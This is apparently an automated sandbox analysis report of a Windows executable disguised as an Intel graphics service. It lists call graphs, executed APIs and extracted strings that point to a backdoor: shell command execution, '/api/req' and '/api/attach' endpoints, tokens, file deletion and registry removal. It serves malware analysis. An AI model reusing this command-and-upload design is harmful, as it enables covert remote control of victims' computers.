                                    • Part of subcall function 00BF55C4: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BF55D0
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00BE930F
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00BE9336
                                  Strings
                                  • invalid string position, xrefs: 00BE92E0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy$std::invalid_argument::invalid_argument
                                  • String ID: invalid string position
                                  • API String ID: 2082942147-1799206989
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Execution Graph

                                  Execution Coverage:3.8%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:1291
                                  Total number of Limit Nodes:55

                                  Graph

d2513e 33162->33153 33374 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 33162->33374 33163 d250ed 33370 d41341 25 API calls __strnicoll 33163->33370 33373 d13ee0 GetLastError RaiseException 33165->33373 33168 d25116 33372 d41341 25 API calls __strnicoll 33168->33372 33171 d2516c 33173 d23d82 33172->33173 33174 d26890 100 API calls 33173->33174 33175 d23dad error_info_injector 33173->33175 33174->33175 33175->32995 33176->33005 33177->33005 33178->33005 33180 d12bf1 33179->33180 33181 d12be9 33179->33181 33180->32980 33183 d12c00 33181->33183 33375 d3731a RaiseException 33181->33375 33376 d12ba0 27 API calls 33183->33376 33185 d12c30 33377 d3731a RaiseException 33185->33377 33187 d12c3f 33378 d36b4e 26 API calls ___std_exception_copy 33187->33378 33189 d12c64 33189->32980 33190->32968 33191->32972 33192->32976 33193->32979 33194->32983 33197 d12bd0 27 API calls 33196->33197 33198 d28889 33197->33198 33221 d348c6 33198->33221 33200 d28890 33235 d35776 33200->33235 33202 d288a0 33247 d29cb0 33202->33247 33205 d23125 33207 d26a20 33205->33207 33206 d12bd0 27 API calls 33206->33205 33208 d348c6 std::_Facet_Register 27 API calls 33207->33208 33209 d26a5a 33208->33209 33210 d35776 std::locale::_Init 75 API calls 33209->33210 33211 d2314b 33210->33211 33212 d26960 33211->33212 33213 d26a04 33212->33213 33214 d2698f 33212->33214 33213->33137 33321 d35b24 33214->33321 33218 d269ad 33328 d2a760 97 API calls 3 library calls 33218->33328 33220 d269cd 33220->33137 33224 d348cb 33221->33224 33223 d348e5 33223->33200 33224->33223 33226 d348e7 33224->33226 33268 d427bf EnterCriticalSection LeaveCriticalSection std::_Facet_Register 33224->33268 33269 d4274c 15 API calls 2 library calls 33224->33269 33227 d121c0 Concurrency::cancel_current_task 33226->33227 33229 d348f1 std::_Facet_Register 33226->33229 33266 d3731a RaiseException 33227->33266 33270 d3731a RaiseException 33229->33270 33230 d121dc 33267 d36b4e 26 API calls ___std_exception_copy 33230->33267 33233 
d35006 33234 d12203 33234->33200 33236 d35782 __EH_prolog3 33235->33236 33271 d35428 33236->33271 33241 d357a0 33283 d358fe 33241->33283 33242 d357fe std::locale::_Init 33242->33202 33246 d357be 33287 d35480 33246->33287 33248 d35428 std::_Lockit::_Lockit 7 API calls 33247->33248 33249 d29cf5 33248->33249 33250 d35428 std::_Lockit::_Lockit 7 API calls 33249->33250 33255 d29d37 33249->33255 33251 d29d17 33250->33251 33253 d35480 std::_Lockit::~_Lockit 2 API calls 33251->33253 33252 d35480 std::_Lockit::~_Lockit 2 API calls 33254 d288d3 33252->33254 33253->33255 33254->33205 33254->33206 33256 d29d7f 33255->33256 33257 d348c6 std::_Facet_Register 27 API calls 33255->33257 33256->33252 33258 d29d8a 33257->33258 33317 d12850 96 API calls 2 library calls 33258->33317 33260 d29dba 33318 d35b6f 71 API calls __Getctype 33260->33318 33262 d29dd0 33319 d12900 96 API calls 3 library calls 33262->33319 33264 d29de2 33320 d35744 27 API calls std::_Facet_Register 33264->33320 33266->33230 33267->33234 33268->33224 33269->33224 33270->33233 33272 d35437 33271->33272 33273 d3543e 33271->33273 33295 d4535a 6 API calls std::_Lockit::_Lockit 33272->33295 33276 d3543c 33273->33276 33296 d35dfb EnterCriticalSection 33273->33296 33276->33246 33277 d358db 33276->33277 33278 d348c6 std::_Facet_Register 27 API calls 33277->33278 33279 d358e6 33278->33279 33280 d358fa 33279->33280 33297 d3560a 15 API calls _Yarn 33279->33297 33280->33241 33282 d358f8 33282->33241 33284 d3590a 33283->33284 33286 d357a8 33283->33286 33298 d35e7f 33284->33298 33294 d356ce 15 API calls 2 library calls 33286->33294 33288 d3548a 33287->33288 33289 d45368 33287->33289 33290 d3549d 33288->33290 33315 d35e09 LeaveCriticalSection 33288->33315 33316 d45343 LeaveCriticalSection 33289->33316 33290->33242 33293 d4536f 33293->33242 33294->33246 33295->33276 33296->33276 33297->33282 33299 d35e8f RtlEncodePointer 33298->33299 33300 d45e99 33298->33300 33299->33286 33311 d4c33d EnterCriticalSection LeaveCriticalSection 
__purecall 33300->33311 33302 d45e9e 33303 d45eaa 33302->33303 33312 d4c38b 71 API calls 7 library calls 33302->33312 33305 d45ed2 33303->33305 33306 d45eb3 IsProcessorFeaturePresent 33303->33306 33314 d42c1f 71 API calls __purecall 33305->33314 33307 d45ebf 33306->33307 33313 d41195 8 API calls 2 library calls 33307->33313 33310 d45edc 33311->33302 33312->33303 33313->33305 33314->33310 33315->33290 33316->33293 33317->33260 33318->33262 33319->33264 33320->33256 33323 d35a7e 33321->33323 33322 d2699c 33322->33213 33327 d267a0 25 API calls 33322->33327 33323->33322 33326 d35ae6 33323->33326 33329 d42600 97 API calls 33323->33329 33325 d40ee6 100 API calls 33325->33322 33326->33322 33326->33325 33327->33218 33328->33220 33329->33326 33331 d2f21d 33330->33331 33338 d32150 33331->33338 33333 d12bd0 27 API calls 33334 d2a59d 33333->33334 33334->33005 33335 d2f299 33335->33333 33337 d2f231 33337->33335 33345 d27c10 27 API calls 2 library calls 33337->33345 33339 d32182 33338->33339 33341 d321b0 33338->33341 33340 d12bd0 27 API calls 33339->33340 33343 d3219c 33340->33343 33342 d321bc 33341->33342 33346 d32000 27 API calls 33341->33346 33342->33337 33343->33337 33345->33337 33346->33342 33348 d2678a 33347->33348 33349 d266ed 33347->33349 33350 d344d0 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33348->33350 33349->33348 33354 d266f7 33349->33354 33351 d26797 33350->33351 33351->33150 33352 d26778 33353 d344d0 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33352->33353 33355 d26786 33353->33355 33354->33352 33356 d26726 33354->33356 33359 d26740 33354->33359 33355->33150 33356->33352 33357 d2672b 33356->33357 33360 d344d0 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33357->33360 33358 d26761 33362 d344d0 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 
33358->33362 33359->33358 33366 d4177b 97 API calls 2 library calls 33359->33366 33364 d2673c 33360->33364 33363 d26774 33362->33363 33363->33150 33364->33150 33365 d2675a 33365->33352 33365->33358 33366->33365 33367->33155 33368->33156 33369->33163 33370->33165 33371->33168 33372->33165 33373->33162 33374->33171 33375->33183 33376->33185 33377->33187 33378->33189 33380 d16a45 33379->33380 33400 d25e20 27 API calls 3 library calls 33380->33400 33382 d16a84 33385 d16b8e 33382->33385 33401 d347ec 5 API calls ___report_securityfailure 33382->33401 33384 d16c5e 33385->33016 33385->33017 33387 d16689 33386->33387 33402 d26060 33387->33402 33389 d167f0 error_info_injector 33390 d344d0 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33389->33390 33391 d16814 33390->33391 33391->33024 33392 d1681a 33411 d41351 25 API calls 2 library calls 33392->33411 33394 d1669e 33394->33389 33394->33392 33396->33021 33398->33027 33400->33382 33401->33384 33403 d26080 ___scrt_fastfail 33402->33403 33404 d2609e 33402->33404 33403->33394 33405 d260a6 33404->33405 33406 d260f9 33404->33406 33412 d28b10 27 API calls 2 library calls 33405->33412 33413 d12260 33406->33413 33410 d260d0 ___scrt_fastfail 33410->33394 33412->33410 33416 d355a4 27 API calls 2 library calls 33413->33416 33417->33048 33418->33046 33430 d47d3d 33419->33430 33422->33065 33423->33061 33424->33073 33425->33070 33426->33076 33427->33070 33428->33059 33429->33063 33431 d40fc6 33430->33431 33432 d47d5a 33430->33432 33431->33056 33432->33431 33434 d53266 GetStringTypeW 33432->33434 33434->33431 33435->33084 33437 d26d50 33436->33437 33440 d26d59 33436->33440 33437->33091 33439 d26ea6 33441 d26dcc __Getctype 33440->33441 33442 d26da7 33440->33442 33443 d26dbd 33440->33443 33460 d26e94 33440->33460 33453 d26e80 33441->33453 33454 d26dbb WideCharToMultiByte 33441->33454 33472 d3c962 28 API calls 2 library calls 33442->33472 33473 d41d58 14 API calls _free 33443->33473 33447 
d26db0 33451 d26e76 33447->33451 33447->33454 33448 d26e15 GetLastError 33449 d26e20 WideCharToMultiByte 33448->33449 33450 d26e66 33448->33450 33474 d2ae70 30 API calls 2 library calls 33449->33474 33452 d26e6d 33450->33452 33477 d2aae0 14 API calls ___std_exception_copy 33450->33477 33475 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 33451->33475 33452->33091 33476 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 33453->33476 33454->33448 33454->33450 33459 d26e44 WideCharToMultiByte 33459->33450 33478 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 33460->33478 33464 d27d36 __InternalCxxFrameHandler 33461->33464 33465 d27d5e 33461->33465 33462 d27e07 33463 d12260 27 API calls 33462->33463 33466 d27e0c 33463->33466 33464->33093 33465->33462 33479 d28b10 27 API calls 2 library calls 33465->33479 33468 d27da7 _Yarn 33469 d27de9 error_info_injector 33468->33469 33480 d41351 25 API calls 2 library calls 33468->33480 33469->33093 33471->33094 33472->33447 33473->33454 33474->33459 33475->33453 33476->33450 33477->33460 33478->33439 33479->33468 33481 d344e6 33492 d3450d InitializeCriticalSectionAndSpinCount GetModuleHandleW 33481->33492 33483 d344eb 33503 d349a5 4 API calls 2 library calls 33483->33503 33485 d344f2 33486 d344f7 33485->33486 33487 d34505 33485->33487 33504 d34b32 28 API calls 33486->33504 33505 d34dd5 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 33487->33505 33490 d34501 33491 d3450c 33493 d34541 GetProcAddress GetProcAddress 33492->33493 33494 d34530 GetModuleHandleW 33492->33494 33496 d34571 CreateEventW 33493->33496 33497 d3455f 33493->33497 33494->33493 33495 d34587 33494->33495 33506 d34dd5 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 33495->33506 33496->33495 33498 d34563 33496->33498 33497->33496 33497->33498 33498->33483 33500 d3458e 
DeleteCriticalSection 33501 d345a3 CloseHandle 33500->33501 33502 d345aa 33500->33502 33501->33502 33502->33483 33503->33485 33504->33490 33505->33491 33506->33500 33507 d48e5d 33512 d48bf2 33507->33512 33510 d48e9c 33517 d48c20 ___vcrt_FlsFree 33512->33517 33514 d48e4b 33531 d41341 25 API calls __strnicoll 33514->33531 33516 d48d7b 33516->33510 33524 d542a4 33516->33524 33522 d48d70 33517->33522 33527 d41f2f 72 API calls 2 library calls 33517->33527 33519 d48dd8 33519->33522 33528 d41f2f 72 API calls 2 library calls 33519->33528 33521 d48df6 33521->33522 33529 d41f2f 72 API calls 2 library calls 33521->33529 33522->33516 33530 d41857 14 API calls _free 33522->33530 33532 d539ad 33524->33532 33527->33519 33528->33521 33529->33522 33530->33514 33531->33516 33535 d539b9 __FrameHandler3::FrameUnwindToState 33532->33535 33533 d539c0 33590 d41857 14 API calls _free 33533->33590 33535->33533 33537 d539eb 33535->33537 33536 d539c5 33591 d41341 25 API calls __strnicoll 33536->33591 33543 d53f7a 33537->33543 33542 d539cf 33542->33510 33593 d53d56 33543->33593 33546 d53fc5 33611 d4c8f7 33546->33611 33547 d53fac 33625 d41844 14 API calls _free 33547->33625 33551 d53fd3 33627 d41844 14 API calls _free 33551->33627 33552 d53fea 33624 d53cc1 CreateFileW 33552->33624 33556 d53a0f 33592 d53a42 LeaveCriticalSection __wsopen_s 33556->33592 33557 d53fd8 33628 d41857 14 API calls _free 33557->33628 33559 d54023 33560 d540a0 GetFileType 33559->33560 33562 d54075 GetLastError 33559->33562 33629 d53cc1 CreateFileW 33559->33629 33563 d540f2 33560->33563 33564 d540ab GetLastError 33560->33564 33561 d53fb1 33626 d41857 14 API calls _free 33561->33626 33630 d41821 14 API calls 2 library calls 33562->33630 33633 d4c842 15 API calls 3 library calls 33563->33633 33631 d41821 14 API calls 2 library calls 33564->33631 33567 d540b9 CloseHandle 33567->33561 33569 d540e2 33567->33569 33632 d41857 14 API calls _free 33569->33632 33571 d54068 33571->33560 33571->33562 33573 d54113 33575 d5415f 
33573->33575 33634 d53ed0 103 API calls 4 library calls 33573->33634 33574 d540e7 33574->33561 33580 d54166 33575->33580 33635 d53a6e 103 API calls 4 library calls 33575->33635 33578 d54194 33579 d541a2 33578->33579 33578->33580 33579->33556 33582 d5421e CloseHandle 33579->33582 33581 d49118 __wsopen_s 28 API calls 33580->33581 33581->33556 33636 d53cc1 CreateFileW 33582->33636 33584 d54249 33585 d5427f 33584->33585 33586 d54253 GetLastError 33584->33586 33585->33556 33637 d41821 14 API calls 2 library calls 33586->33637 33588 d5425f 33638 d4ca0a 15 API calls 3 library calls 33588->33638 33590->33536 33591->33542 33592->33542 33594 d53d77 33593->33594 33595 d53d91 33593->33595 33594->33595 33646 d41857 14 API calls _free 33594->33646 33639 d53ce6 33595->33639 33598 d53d86 33647 d41341 25 API calls __strnicoll 33598->33647 33600 d53dc9 33601 d53df8 33600->33601 33648 d41857 14 API calls _free 33600->33648 33608 d53e4b 33601->33608 33650 d43960 25 API calls 2 library calls 33601->33650 33604 d53e46 33606 d53ec3 33604->33606 33604->33608 33605 d53ded 33649 d41341 25 API calls __strnicoll 33605->33649 33651 d4136e 11 API calls __purecall 33606->33651 33608->33546 33608->33547 33610 d53ecf 33612 d4c903 __FrameHandler3::FrameUnwindToState 33611->33612 33654 d452fb EnterCriticalSection 33612->33654 33615 d4c90a 33616 d4c92f 33615->33616 33620 d4c99e EnterCriticalSection 33615->33620 33623 d4c951 33615->33623 33658 d4c6d1 33616->33658 33622 d4c9ab LeaveCriticalSection 33620->33622 33620->33623 33622->33615 33655 d4ca01 33623->33655 33624->33559 33625->33561 33626->33556 33627->33557 33628->33561 33629->33571 33630->33561 33631->33567 33632->33574 33633->33573 33634->33575 33635->33578 33636->33584 33637->33588 33638->33585 33641 d53cfe 33639->33641 33640 d53d19 33640->33600 33641->33640 33652 d41857 14 API calls _free 33641->33652 33643 d53d3d 33653 d41341 25 API calls __strnicoll 33643->33653 33645 d53d48 33645->33600 33646->33598 33647->33595 33648->33605 33649->33601 
33650->33604 33651->33610 33652->33643 33653->33645 33654->33615 33666 d45343 LeaveCriticalSection 33655->33666 33657 d4c971 33657->33551 33657->33552 33659 d46876 _free 14 API calls 33658->33659 33660 d4c6e3 33659->33660 33664 d4c6f0 33660->33664 33667 d49972 6 API calls _free 33660->33667 33663 d4c745 33663->33623 33665 d4c81f EnterCriticalSection 33663->33665 33668 d468d3 14 API calls _free 33664->33668 33665->33623 33666->33657 33667->33660 33668->33663 33669 d4300f 33678 d4be03 GetEnvironmentStringsW 33669->33678 33674 d43032 33686 d468d3 14 API calls _free 33674->33686 33675 d43056 33677 d43027 33687 d468d3 14 API calls _free 33677->33687 33679 d4be17 33678->33679 33680 d43021 33678->33680 33681 d4690d __strnicoll 15 API calls 33679->33681 33680->33677 33685 d4312c 25 API calls 2 library calls 33680->33685 33682 d4be2b _Yarn 33681->33682 33688 d468d3 14 API calls _free 33682->33688 33684 d4be45 FreeEnvironmentStringsW 33684->33680 33685->33674 33686->33677 33687->33675 33688->33684 33689 d34c4f 33690 d34c5b __FrameHandler3::FrameUnwindToState 33689->33690 33717 d3496c 33690->33717 33692 d34c62 33693 d34db5 33692->33693 33698 d34c8c 33692->33698 33751 d34dd5 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 33693->33751 33695 d34dbc 33752 d42c5b 71 API calls __purecall 33695->33752 33697 d34dc2 33753 d42c1f 71 API calls __purecall 33697->33753 33701 d34cab 33698->33701 33706 d34ccb ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 33698->33706 33728 d438ed 33698->33728 33700 d34dca 33703 d34d2c 33732 d34eef 33703->33732 33705 d34d32 33736 d21330 33705->33736 33706->33703 33747 d42c35 71 API calls 4 library calls 33706->33747 33711 d34d4e 33711->33695 33712 d34d52 33711->33712 33713 d34d5b 33712->33713 33749 d42c10 71 API calls __purecall 33712->33749 33750 d34add 106 API calls ___scrt_uninitialize_crt 33713->33750 33716 d34d63 33716->33701 33718 d34975 33717->33718 33754 d35007 
IsProcessorFeaturePresent 33718->33754 33720 d34981 33755 d37186 10 API calls 2 library calls 33720->33755 33722 d34986 33727 d3498a 33722->33727 33756 d437de 33722->33756 33725 d349a1 33725->33692 33727->33692 33729 d4392d 33728->33729 33730 d43911 33728->33730 33729->33706 33730->33729 33797 d111f0 33730->33797 33971 d371c0 33732->33971 33734 d34f02 GetStartupInfoW 33735 d34f15 33734->33735 33735->33705 33738 d21380 33736->33738 33737 d3c92f 71 API calls 33737->33738 33738->33737 33739 d3c92f 71 API calls 33738->33739 33741 d213b7 33738->33741 33740 d213a0 SleepEx 33739->33740 33740->33738 33742 d3c92f 71 API calls 33741->33742 33743 d213bc SleepEx CreateDirectoryW 33742->33743 33744 d213e2 33743->33744 33745 d344d0 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33744->33745 33746 d21400 33745->33746 33748 d34f25 GetModuleHandleW 33746->33748 33747->33703 33748->33711 33749->33713 33750->33716 33751->33695 33752->33697 33753->33700 33754->33720 33755->33722 33760 d4c1d6 33756->33760 33759 d371a5 7 API calls 2 library calls 33759->33727 33761 d4c1e6 33760->33761 33762 d34993 33760->33762 33761->33762 33764 d467ea 33761->33764 33762->33725 33762->33759 33765 d467f6 __FrameHandler3::FrameUnwindToState 33764->33765 33776 d452fb EnterCriticalSection 33765->33776 33767 d467fd 33777 d4c781 33767->33777 33769 d4681b 33792 d46841 LeaveCriticalSection std::_Lockit::~_Lockit 33769->33792 33773 d46816 33791 d46736 GetStdHandle GetFileType 33773->33791 33774 d4682c 33774->33761 33776->33767 33778 d4c78d __FrameHandler3::FrameUnwindToState 33777->33778 33779 d4c796 33778->33779 33780 d4c7b7 33778->33780 33794 d41857 14 API calls _free 33779->33794 33793 d452fb EnterCriticalSection 33780->33793 33783 d4c79b 33795 d41341 25 API calls __strnicoll 33783->33795 33786 d4c6d1 __wsopen_s 15 API calls 33788 d4c7c3 33786->33788 33787 d4680c 33787->33769 33790 d46680 28 API calls 33787->33790 33788->33786 33789 d4c7ef 33788->33789 
33796 d4c816 LeaveCriticalSection std::_Lockit::~_Lockit 33789->33796 33790->33773 33791->33769 33792->33774 33793->33788 33794->33783 33795->33787 33796->33787 33945 d42707 33797->33945 33800 d140f0 40 API calls 33801 d11227 33800->33801 33802 d11278 33801->33802 33803 d1122d 33801->33803 33959 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 33802->33959 33806 d27040 37 API calls 33803->33806 33805 d11282 33960 d28b10 27 API calls 2 library calls 33805->33960 33808 d1124c 33806->33808 33810 d1125b 33808->33810 33812 d25750 29 API calls 33808->33812 33809 d112d8 33961 d173a0 28 API calls 3 library calls 33809->33961 33958 d34b32 28 API calls 33810->33958 33812->33810 33814 d112fe 33816 d140f0 40 API calls 33814->33816 33815 d11265 33815->33730 33817 d11317 33816->33817 33818 d113d8 33817->33818 33820 d11321 33817->33820 33964 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 33818->33964 33822 d27040 37 API calls 33820->33822 33821 d113e2 33965 d41351 25 API calls 2 library calls 33821->33965 33824 d1133b 33822->33824 33826 d11348 33824->33826 33828 d25750 29 API calls 33824->33828 33962 d24f70 42 API calls 33826->33962 33828->33826 33833 d113a7 error_info_injector 33963 d34b32 28 API calls 33833->33963 33834 d1135f 33834->33821 33834->33833 33838 d113bb 33841 d344d0 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33838->33841 33842 d113d4 33841->33842 33842->33730 33946 d4261b __FrameHandler3::FrameUnwindToState 33945->33946 33947 d4262e 33946->33947 33951 d42654 33946->33951 33966 d41857 14 API calls _free 33947->33966 33949 d42633 33967 d41341 25 API calls __strnicoll 33949->33967 33968 d452fb EnterCriticalSection 33951->33968 33952 d1121d 33952->33800 33954 d4265f 33969 d4269a 71 API calls __strnicoll 33954->33969 33956 d4266a 33970 d42691 LeaveCriticalSection std::_Lockit::~_Lockit 33956->33970 33958->33815 33959->33805 33960->33809 33961->33814 33962->33834 33963->33838 
33964->33821 33966->33949 33967->33952 33968->33954 33969->33956 33970->33952 33971->33734 33972 d34c3d 33977 d34f68 SetUnhandledExceptionFilter 33972->33977 33974 d34c42 33978 d451ea 25 API calls 2 library calls 33974->33978 33976 d34c4d 33977->33974 33978->33976

                                  Executed Functions

                                  APIs
                                  • SetUnhandledExceptionFilter.KERNELBASE(00D34F74,00D34C42), ref: 00D34F6D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: 1416536697ec8dced1cf9c97badba0f08851010c972df474784e62b3b095adf3
                                  • Instruction ID: bd7815238d3f4f0a98c2ed8b53a63e3f7debd7a8350f101fc2f22f657bd09d47
                                  • Opcode Fuzzy Hash: 1416536697ec8dced1cf9c97badba0f08851010c972df474784e62b3b095adf3
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  [Control-flow graph for function d1eef0 (edge list omitted): its basic blocks call CreateDirectoryW, SysAllocStringLen, SleepEx and DeleteFileW, and the subroutines d140f0, d27040, d25750, d24f70, d173a0, d25870, d28500 and d19ce0.]
                                  APIs
                                  • CreateDirectoryW.KERNEL32(?,00000000,?,00D66C58,?,00D66C58), ref: 00D1F18D
                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 00D1F23F
                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 00D1F252
                                  • SleepEx.KERNEL32(?,00000000,?,?,?,00D66C58,?,00D66C58), ref: 00D1F27F
                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,00D66C58,?,00D66C58), ref: 00D1F288
                                    • Part of subcall function 00D19CE0: ShellExecuteExW.SHELL32(?), ref: 00D19D3A
                                    • Part of subcall function 00D19CE0: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D19D45
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: AllocString$CreateDeleteDirectoryExecuteFileObjectShellSingleSleepWait
                                  • String ID: > "$" /F$' '$.zip$/api/attach$/api/req$/c $4$IjkiCA==$Pj0mFDk=$Yyw/Aw==$\txc1.txt$\txc1.txt" && type "$\txc1.txt" > "$\txc2.txt$\txc2.txt"$cannot get value$cannot use operator[] with a numeric argument with $cannot use operator[] with a string argument with $cmd$command$data$dir$exe$exit$name$remove_reg$request$ss"}$tion"}$token=$type$url$y '${"status":"success","result":"
                                  • API String ID: 2258598679-1644749762
                                  • Opcode ID: faedbab76891777c11ab4363b5f8cc14fa9d84ebe34e7a3f1daea47566e3631c
                                  • Instruction ID: db3c28ed8310231d028189fa095ab271f6af9abf49055d30897ac0cd2b63beef
                                  • Opcode Fuzzy Hash: faedbab76891777c11ab4363b5f8cc14fa9d84ebe34e7a3f1daea47566e3631c
                                  • Instruction Fuzzy Hash: EE42B130900649DBEB10DF68D845B9DFBB5EF55318F1882A8E4059B292EF349D45CBB1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  [Control-flow graph for function d3450d (edge list omitted): its basic blocks call InitializeCriticalSectionAndSpinCount, GetModuleHandleW, GetProcAddress, CreateEventW, DeleteCriticalSection and CloseHandle, and the subroutine d34dd5.]
                                  APIs
                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(00D6F1D8,00000FA0,?,?,00D344EB), ref: 00D34519
                                  • GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,00D344EB), ref: 00D34524
                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00D344EB), ref: 00D34535
                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D34547
                                  • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D34555
                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00D344EB), ref: 00D34578
                                  • ___scrt_fastfail.LIBCMT ref: 00D34589
                                  • DeleteCriticalSection.KERNEL32(00D6F1D8,00000007,?,?,00D344EB), ref: 00D34594
                                  • CloseHandle.KERNEL32(00000000,?,?,00D344EB), ref: 00D345A4
                                  Strings
                                  • kernel32.dll, xrefs: 00D34530
                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D3451F
                                  • SleepConditionVariableCS, xrefs: 00D34541
                                  • WakeAllConditionVariable, xrefs: 00D3454D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                  • API String ID: 3578986977-3242537097
                                  • Opcode ID: 06d71198abbc97e26f76b062836246dbfca7114ae569147b3fdda397bc79c880
                                  • Instruction ID: 1f0d2d374b029f3307330a12cb67228f304c3185dea8e0d9e8c86386993293e4
                                  • Opcode Fuzzy Hash: 06d71198abbc97e26f76b062836246dbfca7114ae569147b3fdda397bc79c880
                                  • Instruction Fuzzy Hash: 85017571E557319FDB101B6DFD0DA663AA8AB417D2B080221FE06D23D4DB6CDC089672
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Control-flow Graph

                                  control_flow_graph 224 d4a8af-d4a8bf 225 d4a8c1-d4a8d4 call d41844 call d41857 224->225 226 d4a8d9-d4a8db 224->226 240 d4ac58 225->240 227 d4ac40-d4ac4d call d41844 call d41857 226->227 228 d4a8e1-d4a8e7 226->228 246 d4ac53 call d41341 227->246 228->227 231 d4a8ed-d4a913 228->231 231->227 235 d4a919-d4a922 231->235 238 d4a924-d4a937 call d41844 call d41857 235->238 239 d4a93c-d4a93e 235->239 238->246 243 d4a944-d4a947 239->243 244 d4ac3c-d4ac3e 239->244 245 d4ac5b-d4ac5e 240->245 243->244 248 d4a94d-d4a951 243->248 244->245 246->240 248->238 251 d4a953-d4a96a 248->251 253 d4a96c-d4a96f 251->253 254 d4a9bb-d4a9c1 251->254 255 d4a971-d4a97a 253->255 256 d4a97f-d4a985 253->256 257 d4a987-d4a99e call d41844 call d41857 call d41341 254->257 258 d4a9c3-d4a9cd 254->258 259 d4aa3f-d4aa4f 255->259 256->257 260 d4a9a3-d4a9b6 256->260 290 d4ab73 257->290 262 d4a9d4-d4a9f2 call d4690d call d468d3 * 2 258->262 263 d4a9cf-d4a9d1 258->263 265 d4ab14-d4ab1d call d51bca 259->265 266 d4aa55-d4aa61 259->266 260->259 294 d4a9f4-d4aa0a call d41857 call d41844 262->294 295 d4aa0f-d4aa38 call d4ae02 262->295 263->262 279 d4ab90 265->279 280 d4ab1f-d4ab31 265->280 266->265 270 d4aa67-d4aa69 266->270 